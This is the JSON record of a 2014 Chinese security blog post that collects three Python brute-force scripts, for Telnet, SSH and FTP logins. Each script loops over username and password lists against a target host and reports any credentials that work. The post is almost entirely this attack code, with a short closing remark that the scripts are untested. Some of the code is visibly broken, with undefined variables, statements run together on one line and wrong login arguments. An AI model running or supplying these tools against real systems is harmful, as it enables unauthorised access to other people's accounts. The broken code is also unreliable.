{"id":366,"date":"2014-07-03T13:20:04","date_gmt":"2014-07-03T13:20:04","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=366"},"modified":"2014-07-03T13:20:04","modified_gmt":"2014-07-03T13:20:04","slug":"%e4%b8%80%e4%ba%9b%e6%9c%89%e7%94%a8%e7%9a%84python%e8%84%9a%e6%9c%acbak","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/366.html","title":{"rendered":"\u4e00\u4e9b\u6709\u7528\u7684Python\u811a\u672c[bak]"},"content":{"rendered":"
Telnet\u7206\u7834\u811a\u672c\uff1a<\/h6>\n
#!usr\/bin\/python\n#Telnet Brute Forcer\n#http:\/\/www.darkc0de.com\n#d3hydr8[at]gmail[dot]com\n\nimport threading, time, random, sys, telnetlib\nfrom copy import copy\n\nif len(sys.argv) !=4:\n\tprint \"Usage: .\/telnetbrute.py <server> <userlist> <wordlist>\"\n\tsys.exit(1)\n\ntry:\n  \tusers = open(sys.argv[2], \"r\").readlines()\nexcept(IOError):\n  \tprint \"Error: Check your userlist pathn\"\n  \tsys.exit(1)\n\ntry:\n  \twords = open(sys.argv[3], \"r\").readlines()\nexcept(IOError):\n  \tprint \"Error: Check your wordlist pathn\"\n  \tsys.exit(1)\n\nprint \"nt   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0\"\nprint \"t--------------------------------------------------n\"\nprint \"[+] Server:\",sys.argv[1]\nprint \"[+] Users Loaded:\",len(users)\nprint \"[+] Words Loaded:\",len(words),\"n\"\n\nwordlist = copy(words)\n\ndef reloader():\n\tfor word in wordlist:\n\t\twords.append(word)\n\ndef getword():\n\tlock = threading.Lock()\n\tlock.acquire()\n\tif len(words) != 0:\n\t\tvalue = random.sample(words,  1)\n\t\twords.remove(value[0])\n\n\telse:\n\t\tprint \"nReloading Wordlist - Changing Usern\"\n\t\treloader()\n\t\tvalue = random.sample(words,  1)\n\t\tusers.remove(users[0])\n\n\tlock.release()\n\tif len(users) ==1:\n\t\treturn value[0][:-1], users[0]\n\telse:\n\t\treturn value[0][:-1], users[0][:-1]\n\nclass Worker(threading.Thread):\n\n\tdef run(self):\n\t\tvalue, user = getword()\n\t\ttry:\n\t\t\tprint \"-\"*12\n\t\t\tprint \"User:\",user,\"Password:\",value\n\t\t\ttn = telnetlib.Telnet(sys.argv[1])\n\t\t\ttn.read_until(\"login: \")\n\t\t\ttn.write(user + \"n\")\n\t\t\tif password:\n\t\t\t\t\ttn.read_until(\"Password: \")\n\t\t\t\t\ttn.write(value + \"n\")\n\t\t\ttn.write(\"lsn\")\n\t\t\ttn.write(\"exitn\")\n\t\t\tprint tn.read_all()\n\t\t\tprint \"tnLogin successful:\",value, user\n\t\t\ttn.close()\n\t\t\twork.join()\n\t\t\tsys.exit(2)\n\t\texcept:\n\t\t\tpass\n\nfor I in range(len(words)*len(users)):\n\twork = Worker()\n\twork.start()\n\ttime.sleep(1)<\/pre>\n
SSH\u7684\u7206\u7834\u811a\u672c\uff08\u6bd4\u8f83\u7f57\u55e6\uff0c\u5f85\u4fee\u6539\uff09\uff1a<\/h6>\n
#!\/usr\/bin\/env python\n#-*-coding = UTF-8-*-\n#author@:dengyongkai\n#blog@:blog.sina.com.cn\/kaiyongdeng\n\nimport sys\nimport os\nimport time\n#from threading import Thread\n\ntry:\n    from paramiko import SSHClient\n    from paramiko import AutoAddPolicy\nexcept ImportError:\n    print G+'''\n    You need paramiko module.\n\thttp:\/\/www.lag.net\/paramiko\/\n    Debian\/Ubuntu: sudo apt-get install aptitude\n\t\t\t\t : sudo aptitude install python-paramikon'''+END\n    sys.exit(1)\n\ndocs =  \"\"\"\n        \t[*] This was written for educational purpose and pentest only. Use it at your own risk.\n        \t[*] Author will be not responsible for any damage!\n        \t[*] Toolname        : ssh_bf.py\n        \t[*] Author          : xfk\n        \t[*] Version         : v.0.2\n        \t[*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]\n\t\"\"\"\n\n\nif sys.platform == 'linux' or sys.platform == 'linux2':\n         clearing = 'clear'\nelse:\n         clearing = 'cls'\nos.system(clearing)\n\n\nR = \"\u000033[31m\";\nG = \"\u000033[32m\";\nY = \"\u000033[33m\"\nEND = \"\u000033[0m\"\n\n\ndef logo():\n         print G+\"n          \t\t|---------------------------------------------------------------|\"\n         print \"         \t\t|                                                               |\"\n         print \"         \t\t|               blog.sina.com.cn\/kaiyongdeng                    |\"\n         print \"         \t\t|                16\/05\/2012 ssh_bf.py v.0.2                     |\"\n         print \"         \t\t|                  SSH Brute Forcing Tool                       |\"\n         print \"         \t\t|                                                               |\"\n         print \"         \t\t|---------------------------------------------------------------|n\"\n         print \" n      \t        \t[-] %sn\" % time.ctime()\n         print docs+END\n\n\ndef help():\n\tprint Y+\"\t\t[*]-H \t\t--hostname\/ip \t\t<>the target hostname or ip address\"\n\tprint \"\t\t[*]-P \t\t--port \t\t\t<>the ssh service port(default is 22)\"\n\tprint \"\t\t[*]-U \t\t--usernamelist \t\t<>usernames list file\"\n\tprint \"\t\t[*]-P \t\t--passwordlist \t\t<>passwords list file\"\n\tprint \"\t\t[*]-H \t\t--help \t\t\t<>show help information\"\n\tprint \"\t\t[*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]\"+END\n\tsys.exit(1)\n\ndef BruteForce(hostname,port,username,password):\n        '''\n        Create SSH connection to target\n        '''\n        ssh = SSHClient()\n        ssh.set_missing_host_key_policy(AutoAddPolicy())\n        try:\n            ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)\n            status = 'ok'\n            ssh.close()\n        except Exception, e:\n            status = 'error'\n            pass\n\treturn status\n\n\ndef makelist(file):\n    '''\n    Make usernames and passwords lists\n    '''\n    items = []\n\n    try:\n        fd = open(file, 'r')\n    except IOError:\n        print R+'unable to read file '%s'' % file+END\n        pass\n\n    except Exception, e:\n        print R+'unknown error'+END\n        pass\n\n    for line in fd.readlines():\n        item = line.replace('n', '').replace('r', '')\n        items.append(item)\n    fd.close()\n    return items\n\ndef main():\n        logo()\n#\tprint \"hello wold\"\n        try:\n                for arg in sys.argv:\n                        if arg.lower() == '-t' or arg.lower() == '--target':\n                                hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])\n       \t\t \tif arg.lower() == '-p' or arg.lower() == '--port':\n       \t\t\t \tport = sys.argv[int(sys.argv[1:].index(arg))+2]\n                        elif arg.lower() == '-u' or arg.lower() == '--userlist':\n                                userlist = sys.argv[int(sys.argv[1:].index(arg))+2]\n                        elif arg.lower() == '-w' or arg.lower() == '--wordlist':\n                                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]\n                        elif arg.lower() == '-h' or arg.lower() == '--help':\n                                help()\n\t\t\telif len(sys.argv) <= 1:\n                                help()\n        except:\n                print R+\"[-]Cheak your parametars inputn\"+END\n                help()\n        print G+\"n[!] BruteForcing target ...n\"+END\n#        print \"here is ok\"\n#        print hostname,port,wordlist,userlist\n        usernamelist = makelist(userlist)\n        passwordlist = makelist(wordlist)\n\n        print Y+\"[*] SSH Brute Force Praparing.\"\n        print \"[*] %s user(s) loaded.\" % str(len(usernamelist))\n        print \"[*] %s password(s) loaded.\" % str(len(passwordlist))\n        print \"[*] Brute Force Is Starting.......\"+END\n\ttry:\n        \tfor username in usernamelist:\n        \t\tfor password in passwordlist:\n\t\t\t\tprint G+\"n[+]Attempt uaername:%s password:%s...\" % (username,password)+END\n                \t\tcurrent = BruteForce(hostname, port, username, password)\n                        \tif current == 'error':\n\t\t\t\t\tprint R+\"[-]O*O The username:%s and password:%s Is Disenbabled...n\" % (username,password)+END\n#                        \t\tpass\n                        \telse:\n                                \tprint G+\"n[+] ^-^ HaHa,We Got It!!!\"\n                                \tprint \"[+] username: %s\" % username\n                                \tprint \"[+] password: %sn\" % password+END\n#                               \tsys.exit(0)\n\texcept:\n\t\tprint R+\"n[-] There Is Something Wrong,Pleace Cheak It.\"\n\t\tprint \"[-] Exitting.....n\"+END\n\t\traise\n        print Y+\"[+] Done.^-^n\"+END\n        sys.exit(0)\n\n\nif __name__ == \"__main__\":\n\tmain()<\/pre>\n
FTP\u7684\u7206\u7834\u811a\u672c\uff08\u6bd4\u8f83\u7f57\u55e6\uff0c\u5f85\u4fee\u6539\uff09\uff1a<\/h6>\n
#!\/usr\/bin\/env python\n#-*-coding = utf-8-*-\n#author:@xfk\n#blog:@blog.sina.com.cn\/kaiyongdeng\n#date:@2012-05-08\n\nimport sys, os, time\nfrom ftplib import FTP\ndocs = \"\"\"\n           [*] This was written for educational purpose and pentest only. Use it at your own risk.\n           [*] Author will be not responsible for any damage!\n           [*] Toolname : ftp_bf.py\n           [*] Coder :\n           [*] Version : 0.1\n           [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt\n       \"\"\"\n\nif sys.platform == 'linux' or sys.platform == 'linux2':\n    clearing = 'clear'\nelse:\n    clearing = 'cls'\nos.system(clearing)\nR = \"\u000033[31m\";\nG = \"\u000033[32m\";\nY = \"\u000033[33m\"\nEND = \"\u000033[0m\"\ndef logo():\n    print G+\"n |---------------------------------------------------------------|\"\n    print \" | |\"\n    print \" | blog.sina.com.cn\/kaiyongdeng |\"\n    print \" | 08\/05\/2012 ftp_bf.py v.0.1 |\"\n    print \" | FTP Brute Forcing Tool |\"\n    print \" | |\"\n    print \" |---------------------------------------------------------------|n\"\n    print \" n [-] %sn\" % time.strftime(\"%X\")\n    print docs+END\n\ndef help():\n    print R+\"[*]-t, --target ip\/hostname <> Our target\"\n    print \"[*]-u, --usernamelist usernamelist <> usernamelist path\"\n    print \"[*]-p, --passwordlist passwordlist <> passwordlist path\"\n    print \"[*]-h, --help help <> print this help\"\n    print \"[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt\"+END sys.exit(1)\n\ndef bf_login(hostname,username,password):\n    # sys.stdout.write(\"r[!]Checking : %s \" % (p))\n    # sys.stdout.flush()\n    try:\n        ftp = FTP(hostname)\n        ftp.login(hostname,username, password)\n        ftp.retrlines('list')\n        ftp.quit()\n        print Y+\"n[!] w00t,w00t!!! We did it ! \"\n        print \"[+] Target : \",hostname, \"\"\n        print \"[+] User : \",username, \"\"\n        print \"[+] Password : \",password, \"\"+END\n        return 1\n    # sys.exit(1)\n    except Exception, e:\n        pass except KeyboardInterrupt: print R+\"n[-] Exiting ...n\"+END\n    sys.exit(1)\n\ndef anon_login(hostname):\n    try:\n        print G+\"n[!] Checking for anonymous login.n\"+END\n        ftp = FTP(hostname) ftp.login()\n        ftp.retrlines('LIST')\n        print Y+\"n[!] w00t,w00t!!! Anonymous login successfuly !n\"+END\n        ftp.quit()\n    except Exception, e:\n        print R+\"n[-] Anonymous login failed...n\"+END\n        pass\n\ndef main():\n    logo()\n    try:\n        for arg in sys.argv:\n            if arg.lower() == '-t' or arg.lower() == '--target':\n                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]\n            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':\n                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]\n            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':\n                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]\n            elif arg.lower() == '-h' or arg.lower() == '--help':\n                help()\n            elif len(sys.argv) <= 1:\n                help()\n    except:\n        print R+\"[-]Cheak your parametars inputn\"+END\n        help()\n\n    print G+\"[!] BruteForcing target ...\"+END\n    anon_login(hostname)\n    # print \"here is ok\"\n    # print hostname\n    try:\n        usernames = open(usernamelist, \"r\")\n        user = usernames.readlines()\n        count1 = 0\n        while count1 < len(user):\n            user[count1] = user[count1].strip()\n            count1 +=1\n    except:\n        print R+\"n[-] Cheak your usernamelist pathn\"+END\n        sys.exit(1)\n\n    # print \"here is ok \",usernamelist,passwordlist\n    try:\n        passwords = open(passwordlist, \"r\")\n        pwd = passwords.readlines()\n        count2 = 0\n        while count2 < len(pwd):\n            pwd[count2] = pwd[count2].strip()\n            count2 +=1\n    except:\n        print R+\"n[-] Check your passwordlist pathn\"+END\n        sys.exit(1)\n\n    print G+\"n[+] Loaded:\",len(user),\"usernames\"\n    print \"n[+] Loaded:\",len(pwd),\"passwords\"\n    print \"[+] Target:\",hostname\n    print \"[+] Guessing...n\"+END\n    for u in user: for p in pwd:\n        result = bf_login(hostname,u.replace(\"n\",\"\"),p.replace(\"n\",\"\"))\n        if result != 1:\n            print G+\"[+]Attempt uaername:%s password:%s...\" % (u,p) + R+\"Disenable\"+END\n        else:\n            print G+\"[+]Attempt uaername:%s password:%s...\" % (u,p) + Y+\"Enable\"+END\n        if not result :\n            print R+\"n[-]There is no username ans password enabled in the list.\"\n            print \"[-]Exiting...n\"+END\n\nif __name__ == \"__main__\":\n    main()<\/pre>\n
\u4e0a\u9762\u76843\u4e2a\u811a\u672c\u90fd\u8fd8\u6ca1\u6709\u6d4b\u8bd5\uff0c\u7b49\u6d4b\u8bd5\u4e86\u4e4b\u540e\u628a\u6d4b\u8bd5\u6548\u679c\u8865\u5145\u4e0a\u3002\u7136\u540e\u8fd8\u6709\u522b\u7684\u7206\u7834\u811a\u672c\u4ee5\u540e\u6162\u6162\u8865\u5145\uff0c\u4e0d\u540c\u7684\u60c5\u51b5\u6709\u4e0d\u540c\u7684\u65b9\u6cd5\uff0c\u8981\u7075\u6d3b\u8fd0\u7528\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Telnet\u7206\u7834\u811a\u672c\uff1a #!usr\/bin\/python #Telnet Brute Forcer #http […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,25,12],"tags":[178,179,8,153,180],"class_list":["post-366","post","type-post","status-publish","format-standard","hentry","category-programing","category-security","category-tools","tag-brute","tag-ftp","tag-python","tag-ssh","tag-telnet"],"views":2393,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=366"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/366\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}